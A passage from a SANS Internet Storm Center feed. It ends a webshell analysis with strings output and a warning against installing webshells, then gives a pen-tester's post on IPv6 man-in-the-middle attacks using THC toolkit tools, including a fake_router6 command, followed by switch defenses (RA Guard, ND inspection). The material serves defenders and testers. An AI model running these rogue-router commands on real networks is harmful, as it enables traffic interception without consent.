"Mozilla/5.0 (Windows NT 6[.]1; rv:32.0) Gecko/20100101 Firefox/32.0"); Webshells viper qyt0dHv1[.]php > strings -I [+] Various interesting strings: - curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6[.]1; rv:32.0) Gecko/20100101 Firefox/32.0"); - curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5[.]1; en-US; rv: Gecko/2009032609 Firefox/3.0.8'); - curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6[.]0; Windows NT 5[.]1; SV1; .NET CLR 1.1[.]4322; .NET CLR 2.0[.]50727)"); //msnbot/1.0 (+hXXp://search.msn[.]com/msnbot.htm) - curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6[.]1; rv:32.0) Gecko/20100101 Firefox/32.0");

Also search for interesting functions like get_file_content(), eval() or system().

While googling for indicators in the code, I found references to similar webshells reported in 2016. So the code is not new but seems to still be maintained and deployed in the wild. Another good reason to remind you to NEVER install such webshells on production servers. Most of them contain malicious code and backdoors! And of course, web servers should not have direct access to the Internet!


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 14.

ISC Stormcast For Thursday, September 14th 2017;id=5668, (Thu, Sep 14th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2017. szeptember 13.

No IPv6&#x3f; Challenge Accepted&#x21; (Part 1), (Wed, Sep 13th)

I recently had an internal penetration test with a client.  During the initial discussions, where the client set the scope and so on, I asked if they had any IPv6 in their environment (mainly because I'm hoping that someday, someone will say yes).  Their answer was an emphatic "no".  My answer to that was "Challenge Accepted?", and they ruled IPv6 in scope with a "knock yourself out, there's nothing there".

As many of you know, IPv6 is enabled on most modern operating systems, and if a path is found, IPv6 is usually prefered over IPv4.  In most organizations though, IPv6 is disabled on the routers and firewalls - so there's nowhere for IPv6 to go and no way for IPv6 to be auto-configured (aside from Locally Administered Addressing).  That is, until there's a malicious actor (that'd be me) in the environment.

You don't have to look far for tools to exploit the IPv6 protocol.  Kali has the most excellent THC IPv6 Attack Toolkit installed (  Using this toolkit is pretty straigtforward (I only list the tools I commonly use below):

Enumeration Tools:
alive6 is a quick and dirty "what IPv6 hosts are on my network segement?" tool
dump_router6  will (as you'd expect) dump any IPv6 routers on the local segment.  In a production environment, "netstat -rn" will usually do the trick also.
passive_discovery6 combines a number of features, doing passive discovery of the entire network segment, and lifting all the information from the IPv6 multicast packets (which is used instead of broadcasts like ARP in IPv6).

Attack Tools:
fake_dhcps6 and fake_dns6d stand up malicious DHCP and DNS servers, which allow you to give victim hosts "real" IPv6 addresses that can be routed, and resolve DNS queries to malicious IPv6 host addresses.
fake_router26 and fake_router6 are the "go to" Man in the Middle attack tools for IPv6 - these allow you to stand up a default router for IPv6, which will be prefered over existing IPv4 routers.  Note that you need to set up a mechanism to forward IPv6 packets.  This means you need to enable IPv6 forwarding, then either tunnel IPv6 outbound, usually to an internet gateway, or nat/proxy the IPv6 packets back to IPv4 (which you then forward to the "real" IPv4 router).  What this means is that there's some thought and preparation required to mount this attack.  

Mounting an IPv6 Man in the Middle attack is as simple as: "fake_router6 eth0  BAD1::00/64" (the last parameter is the network - either your "fake" IPv6 network, or your customer's real IPv6 network).  Note that you then have to do the other half - send the victim stations' packets on to their destination (stay tuned for that in my next post).

kill_router6 allows you to take any production IPv6 router offline.  So far I haven't needed this tool, IPv6 just isn't widely implemented in corporate clients I generally work with.

More info on using the THC attack toolkit can be found here:

Defenses against these attacks?
The defenses against IPv6 router hijack attacks lie primarily in an organization's switches.  Enabling a feature called "RA Guard" to simply block Router Advertisements (defending against the fake router attack tools):
int Ethernet x/y
    ipv6 nd raguard

If you don't have an IPS on every segment, enabling RA guard on switches will create a syslog event - you can monitor for that with your SEIM, or even easier, look for it directly on your syslog server ( ) .  The log entry you are looking for is:
"ICMPv6-ND: Received RA from FE80::1 on Vlan72"  (of course the vlan number will vary)

Configuring a policy for Neighbor Discovery (ND) can defend against the IPv6 reconnassance tools:
ipv6 nd inspection policy NDPOLICY
    sec-level minimum 2
    device-role monitor

int Ethernet x/y
    ipv6 nd inspection attach-policy NDPOLICY vlan add all

Then don't configure any "trusted" ports for RA (Router Advertisements)

Of course, on any segment that you have an IPS sensor you can use that too, if you don't have IPv6 running in production then if you detect any IPv6 RA packets, DNS responses from a local IP or a DHCP6 responses, these should all be classified as attacks, and dealt with some sense of priority.

Cisco covers IPv6 First Hop Security in much more detail here: - I'd recommend looking at encryption and signing of the IPv6 infrastructure functions if you're standing up an IPv6 infrastructure, and not just defending against rogue IPv6 in an IPv4 network.

Stay tuned, in the next installments to this story I'll cover some handy IPv6 NAT/Proxy attack techniques, a soup-to-nuts IPv6 based Man in the Middle attack, as well as defenses you can implement on on firewalls.

Have I missed anything important in this post?  Do you use a different set of tools to attack IPv6 - maybe Scapy or Metasploit?  Please, post your tools or approaches for discussion in our comment form

Rob VandenBrink


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.